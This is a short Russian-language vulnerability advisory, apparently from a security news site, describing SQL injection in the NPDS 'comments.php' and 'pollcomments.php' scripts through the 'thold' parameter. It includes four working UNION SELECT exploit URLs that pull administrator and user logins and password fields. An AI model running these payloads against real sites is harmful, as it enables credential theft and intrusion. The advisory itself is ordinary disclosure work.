Программа: NPDS

Уязвимость позволяет удаленному
пользователю выполнить произвольные SQL
команды в базе данных приложения.
Уязвимость обнаружена в сценариях 'comments.php'
и 'pollcomments.php' из-за недостаточной фильтрации
данных в параметре 'thold'. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды в базе данных уязвимого
приложения.

Примеры:

http://[target]/npds/comments.php?thold= 0%20UNION%20SELECT%200,0,0,0,
0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://[target]/npds/comments.php?thold= 0%20UNION%20SELECT%200,0,0,0,0,
0,0,0,uname,pass,0,0%20FROM%20users

http://[target]/npds/pollcomments.php?thold=
0%20UNION%20SELECT%200,0,0,0,0,0, 0,0,aid,pwd,0,0%20FROM%20authors

http://[target]/npds/pollcomments.php?op= results&pollID=2&mode=&order=&thold=0%20UNION
%20SELECT%200,0,0,0,0,0,0,0,uname, pass,0,0%20FROM%20u

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии